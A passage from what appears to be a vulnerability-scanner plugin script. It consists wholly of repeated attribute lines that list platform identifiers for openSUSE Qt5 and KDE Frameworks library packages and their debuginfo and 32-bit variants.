script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Style5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Style5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Style5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Style5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libKF5Style5-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCollision-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCollision5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCollision5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCollision5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCollision5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCore-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCore5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCore5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DCore5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DInput-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DInput5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DInput5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DInput5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DInput5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DLogic-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DLogic5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DLogic5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DLogic5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DLogic5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuick5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuick5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuick5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuick5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuickRenderer-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DRenderer-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DRenderer5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DRenderer5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DRenderer5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt53DRenderer5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bluetooth5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bluetooth5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bluetooth5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bluetooth5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bluetooth5-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bluetooth5-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bootstrap-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Bootstrap-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5CLucene5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5CLucene5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5CLucene5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5CLucene5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Compositor5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Compositor5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Compositor5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Compositor5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Concurrent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Concurrent-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Concurrent5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Concurrent5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Concurrent5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Concurrent5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Core5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DBus5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Declarative5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Declarative5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Declarative5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Declarative5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Designer5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Designer5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Designer5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Designer5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DesignerComponents5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DesignerComponents5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DesignerComponents5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5DesignerComponents5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Gui5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Help5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Help5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Help5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Help5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Location5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Location5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Location5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Location5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Multimedia5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Multimedia5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Multimedia5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Multimedia5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Network5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Nfc5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Nfc5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Nfc5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Nfc5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Nfc5-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Nfc5-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGL5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGLExtensions-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5OpenGLExtensions-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PlatformHeaders-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PlatformSupport-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PlatformSupport-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PlatformSupport-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Positioning5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Positioning5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Positioning5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Positioning5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5PrintSupport5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Script5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Script5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Script5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Script5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sensors5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sensors5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sensors5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sensors5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sensors5-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sensors5-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5SerialPort5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5SerialPort5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5SerialPort5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5SerialPort5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-mysql-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-mysql-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Sql5-unixODBC-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Svg5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Svg5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Svg5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Svg5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Test5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WaylandClient5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WaylandClient5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WaylandClient5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WaylandClient5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebChannel5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebChannel5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebChannel5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebChannel5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebChannel5-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebChannel5-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKit5-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebSockets5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebSockets5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebSockets5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebSockets5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebSockets5-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5WebSockets5-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Widgets5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5X11Extras5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5X11Extras5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5X11Extras5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5X11Extras5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Xml-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Xml-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Xml5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Xml5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Xml5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5Xml5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5XmlPatterns5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5XmlPatterns5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5XmlPatterns5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQt5XmlPatterns5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQtQuick5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQtQuick5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQtQuick5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libQtQuick5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-creator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-creator-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-creator-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-linguist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-linguist-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-linguist-devel\");\n 